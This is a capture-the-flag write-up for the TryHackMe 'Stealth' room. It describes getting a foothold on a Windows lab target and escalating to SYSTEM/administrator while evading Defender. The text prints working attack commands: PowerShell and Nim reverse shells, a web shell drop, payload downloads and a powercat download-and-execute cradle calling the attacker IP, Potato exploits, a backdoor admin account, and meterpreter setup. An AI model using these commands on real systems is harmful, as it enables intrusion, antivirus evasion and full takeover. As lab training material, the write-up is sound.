Stealth

Use your evasion skills to pwn a Windows target with an updated defence mechanism. - by 1337rce

TryHackMe | StealthTryHackMe

The following post by 0xb0b is licensed under CC BY 4.0

Recon

We start off with a Nmap scan and are able to detect six open ports. On ports 8000, 8080 and 8443, web servers are running. We also have an open port for RDP (3389) and open ports for SMB (139,445).

The challenge asks us to visit the page on 8080. Here we prompt a PowerShell Script Analyser. Here, we can check if the scripts provided are malicious. Only .ps1 files are allowed. So the idea is to successfully upload a malicious PowerShell script containing a reverse shell, which hopefully gets executed at runtime.

Foothold

We make use of a simple PowerShell reverse shell [powershell-reverse-shell.ps1] found on GitHub. It's a bit older, but it does not get detected. We change the IP and port in the script.

GitHub - martinsohn/PowerShell-reverse-shell: Reverse TCP shell in PowerShell for fun. Made in spring 2020 with inspiration from (and a few fixes to) samratashok/nishang Invoke-PowerShellTcp.ps1 and https://cyberwardog.blogspot.com/2016/08/poweshell-encrypt-tcp-client-server.htmlGitHub

Next, we set up a listener and...

... after a short duration, the reverse connects. We are the user hostevasion\evader with not so many privileges, unfortunately. We head directly to the Desktop of the user to find an encoded flag.

We make use of CyberChef to decode the contents of the flag using base64 and see that the contents of the flag were not actually the flag.

On visiting the site mentioned in the encoded flag, we get a hint, that the blue team got alerted, and we should have deleted the log files.

The log file can be found at C:\xampp\htdocs\uploads. We delete the log.txt...

...and after reloading the page, the flag gets revealed.

Privilege Escalation Variant I

The privilege escalation was a more lucky finding. On enumerating the target, it quickly became apparent that it was a xampp server running. As with challenge AVenger, a web shell (p0wny) was then immediately dropped in htdocs, even if the chances of success were slim, as it was already known that this was also running under the user evader. But the web shell then reveals more privileges for the same user.

To enumerate the target, WinPEAS and PrivescChecker were used. Those weren't detected by AV nor by Windows Defender.

GitHub - itm4n/PrivescCheck: Privilege Escalation Enumeration Script for WindowsGitHub

After invoking PrivescCheck, some information could be gathered.

Xampp is run by the user evader, so in conclusion, we could have write access to the folder. As already mentioned, we drop the web shell p0wny in here.

After placing the shell in htdocs...

curl http://10.8.211.1:9000/shell.php -o C:\xampp\htdocs\shell.php

...the shell could be accessed at http://stealth.thm:8080/shell.php. Here we see that the user in this context has some more privileges. Fortunately, the SeImpersonatePrivilege is present. With that, we are able to make use of the JuicyPotato or PrintSpoofer exploit. At this time, several versions were tested, and attempts were made to execute them. But unfortunately, almost all of them failed and were deleted by Windows Defender. It got me almost to obfuscating the source of those exploits on my own.

But there was a version of zcgonvh that was not detected. This can be compiled on the victim machine. What has to be considered when compiling can be taken from the README.

GitHub - zcgonvh/EfsPotato: Exploit for EfsPotato(MS-EFSR EfsRpcOpenFileRaw with SeImpersonatePrivilege local privalege escalation vulnerability).GitHub

We check for a compiler at C:\Windows\Microsoft.Net\Framework\ and see a v4.0 version is persent. Nice.

We download the source file from out attacker machine, compile with the compiler found at C:\Windows\Microsoft.Net\Framework\v4... and execute it with the whoami command.

curl http://10.8.211.1:9000/EfsPotato/EfsPotato.cs -o C:\xampp\htdocs\ep.cs
C:\Windows\Microsoft.Net\Framework\v4.0.30319\csc.exe ep.cs -nowarn:1691,618
.\ep.exe whoami

We are NT authority\system. This exploit was not able to spawn a reverse shell, but we are able to add our own user.

After adding our user to the machine, we are able to RDP into the machine, since the port 3389 is open.

.\ep.exe "cmd.exe /c net user 0xb0b Password123! /add && net localgroup administrators 0xb0b /add"

On the machine, we head to the C:\Users\Administrator\Desktop folder and accept the UAC to find the flag there.

Privilege Escalation Variant II

I think the showcased privilege escalation path using EfsPotato might not be the intended way, since after doing the same steps again writing this, an executable was found that should not be there. The UACME-Akagi64.exe to defeat UAC, which should be detected by AMSI / Windows Defender. Also in C:Tools was a socat binary present. Since these files were not deleted by Defender, they might be in the exclusions on Microsoft Windows Defender.

Microsoft Defender Antivirus exclusions on Windows ServerMicrosoftLearn

We check the file hash...

... and the executable is indeed UACME-Akagi64.

So, another thinkable way to defeat the Windows Defender is to replace the possible excluded UACME-Akagi64.exe executable with other harmful binaries like a meterpreter reverse shell or exploits like JuicyPotato that get otherwise detected.

I received a note from Amine04 that the entire folder C:\xampp is probably excluded. Replacing the Agaki executable is therefore not necessary. The exclusion seems to be necessary for the foothold part, so that the uploaded files are not deleted directly. This variant therefore does not appear to be the intended one for the challenge.

We want to have it as convenient as possible, so we showcase that with the GodPotato exploit; the object CLSID is not required here, as it is with JuicyPotato.

Using the web shell with the SeImpersonatePrivilege we download the GodPotato exploit on the Desktop of the user evader. After downloading it, we directly try to execute it but get the error that the system cannot execute the specified program. After a short duration, it also gets deleted because Windows Defender is doing its job.

The following step of spawning an extra reverse shell with SeImpersonatePrivileges through the web shell is not necessary, but it is there to show that Microsoft Defender flags the binary as a virus at execution.

We make use of the powercat reverse shell shown in AVenger. We use a batch file to download and execute the shell.

GitHub - secabstraction/PowerCat: A PowerShell TCP/IP swiss army knife.GitHub

First we create the shell using powercat:

┌──(0xb0b㉿kali)-[~/Documents/tryhackme/avenger]
└─$ LHOST=10.8.211.1
                                                                        
┌──(0xb0b㉿kali)-[~/Documents/tryhackme/avenger]
└─$ LPORT=49731
                                                                        
┌──(0xb0b㉿kali)-[~/Documents/tryhackme/avenger]
└─$ rshell=shell-49731.txt
                                                                        
┌──(0xb0b㉿kali)-[~/Documents/tryhackme/avenger]
└─$ pwsh -c "iex (New-Object System.Net.Webclient).DownloadString('https://raw.githubusercontent.com/besimorhino/powercat/master/powercat.ps1');powercat -c $LHOST -p $LPORT -e cmd.exe -ge" > /home/0xb0b/Documents/tryhackme/avenger/$rshell

Prepare the batch to deploy the powercat reverse shell.

echo START /B powershell -c $code=(New-Object System.Net.Webclient).DownloadString('http://10.8.211.1:9000/shell-49731.txt');iex 'powershell -E $code' > deploy.bat

Next, we set up a listener on port 49731 and run the batch file.

Our reverse shell connects, and due to the execution through the web shell, we also have the SeImpersonatePrivilege.

Next, we download the GodPotato executable.

GitHub - BeichenDream/GodPotatoGitHub

After downloading, we have to be quick. So on execution of the GodPotato binary, we get the message "file contains a virus", Microsoft Defender is definitely working.

curl http://10.8.211.1:9000/GodPotato-NET4.exe -o C:\Users\evader\Desktop\gp.exe

.\gp.exe -cmd "cmd /c whoami"

So, now we place the GodPotato into the C:\xampp folder, replacing the UACME-Akagi64.exe. And after execution, we see that the exploit actually works, and we successfully bypassed Windows Defender.

curl http://10.8.211.1:9000/GodPotato-NET4.exe> -o C:\xampp\UACME-Akagi64.exe

.\UACME-Akagi64.exe -cmd "cmd /c whoami"

The exploit also works in the web shell.

Privilege Escalation Variant III

After seeing Aquinas' write-up, I wanted to try out his approach. I didn't see the scheduled task with my tools (I missed the -Extended Parameter using PrivescCheck) and until then I wouldn't have been able to check what this task actually does manually. I'm not very good with Windows yet, but I'm working on it. Thanks at this point to Aquinas for his contribution.

https://github.com/ChrisPritchard/ctf-writeups/blob/master/tryhackme-rooms/stealth.md

check out Aquinas write-up

Other than Aquinas approach, I wanted to test an executable written in Nim as Tyler Ramsbey showcased:

We can check for scheduled tasks using the following command:

schtasks /query /fo LIST /v | findstr /B /C:"Folder" /C:"TaskName" /C:"Run As User" /C:"Schedule" /C:"Scheduled Task State" /C:"Schedule Type" /C:"Repeat: Every" /C:"Comment"

The first scheduled task that pops up is MyTHMTask, run as Administrator.

To check what it is actually doing, we can access the Actions attribute by querying the scheduled task via Get-ScheduledTask. It is executing C:\xampp\DebugCrashTHM.exe. The idea here is to replace the executable with a malicious one, like a reverse shell, under the assumption that the current user can control the scheduled task via stop and start. If the current user is able to control the scheduled task, and the file is replaceable, we can get a connection running a reverse shell.

(Get-ScheduledTask -TaskName "MyTHMTask").Actions

GitHub - Sn1r/Nim-Reverse-Shell: A simple and stealthy reverse shell written in Nim that bypasses Windows Defender detection. This tool allows you to establish a reverse shell connection with a target system. Use responsibly for educational purposes only.GitHub

source of the reverse shell

To install Nim and mingw-w64 run the following:

sudo apt install mingw-w64
sudo apt install nim

Next, we prepare the Nim reverse shell with our IP and port. The reverse shell can be found here:

We chose the reverse shell to be written in nim, as Tyler states it is currently undetectable on current Windows machines. To compile, the following command is used:

┌──(0xb0b㉿kali)-[~/Documents/tryhackme/stealth/Nim-Reverse-Shell]
└─$ nim c -d:mingw --app:gui -o:DebugCrashTHM.exe rev_shell.nim

Next, we set up a listener on our chosen port and downloaded the reverse shell via curl, replacing DebugCrashTHM.exe. After starting the task...

...the reverse shell connects, and we are the user administrator.

Further Ideas

Another idea was to place a meterpreter reverse shell named after UACME-Akagi64.exe in C:\xampp and use the windows-exploit-suggester to maybe find other ways to escalate privileges. The Printerdemon exploit was a possible candidate, but unfortunately, the exploit failed. Here were the steps taken:

Generate the shell:

msfvenom -p windows/meterpreter_reverse_tcp LHOST=10.8.211.1 LPORT=8989 -f exe > UACME-Akagi64.exe

Setup a listener:

msfconsole -x "use exploits/multi/handler; set lhost 10.8.211.1; set lport 8989; set payload windows/meterpreter_reverse_tcp; exploit"

Download the meterpreter reverse shell named UACME-Akagi64.exe.

curl http://10.8.211.1:9000/UACME-Akagi64.exe -o C:\xampp\UACME-Akagi64.exe

Executing the reverse shell:

The meterpreter connects:

Run the exploit suggester in the meterpreter session:

Configure and run the exploit: